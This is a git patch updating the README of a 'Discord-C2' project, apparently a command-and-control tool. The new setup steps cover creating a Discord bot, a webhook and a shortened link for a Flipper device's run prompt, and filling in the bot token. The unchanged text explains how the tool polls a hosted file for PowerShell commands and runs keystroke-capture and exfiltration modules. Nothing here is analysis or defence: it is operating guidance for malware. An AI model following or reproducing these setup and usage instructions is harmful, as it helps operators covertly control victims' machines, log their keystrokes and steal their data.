From a6fee262f7695c58985bd0c75af24343176248ab Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 7 Mar 2024 12:44:28 +0000 Subject: [PATCH] Update README.md --- Discord-C2/README.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/Discord-C2/README.md b/Discord-C2/README.md index fe2f0d3..35fac34 100644 --- a/Discord-C2/README.md +++ b/Discord-C2/README.md @@ -14,10 +14,13 @@ Every 10 seconds it will check a file for a change in the file contents and inte *Using github to host your command file will take up to 5 minutes to run each module command - Use pastebin (account needed) OR your own server to host the txt file for instant response* **SETUP** -1. Goto https://pastebin.com and make an account.. -2. Create an empty paste/file and copy the RAW url. -3. Change YOUR_FILE_URL to the RAW url eg. https://pastebin.com/QeCLTdea -OR- http://your.server.ip.here/files/file.txt -4. Change YOUR_WEBHOOK_URL to your webhook eg. https://discord.com/api/webhooks/123445623531/f4fw3f4r46r44343t5gxxxxxx +1. make a discord bot at https://discord.com/developers/applications/ +2. add the bot to your discord server +3. create a webhook in the desired channel on your server. ( channel-settings/integrations ) +4. FLIPPER ONLY - goto https://t.ly and make a short link for the webhook. (run prompt only allows 256 characters!) +5. Change WEBHOOK_URL below to your short webhook URL eg. https://t.ly/byuf4e +6. Change BOT_TOKEN below with your bot token +7. Change CHANNEL_ID below to the channel id of your webhook. **USAGE** 1. Setup the script @@ -59,4 +62,4 @@ Edit the hosted file contents to any custom powershell script or command to run **Killswitch** -Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands. \ No newline at end of file +Save a hosted file contents as 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands.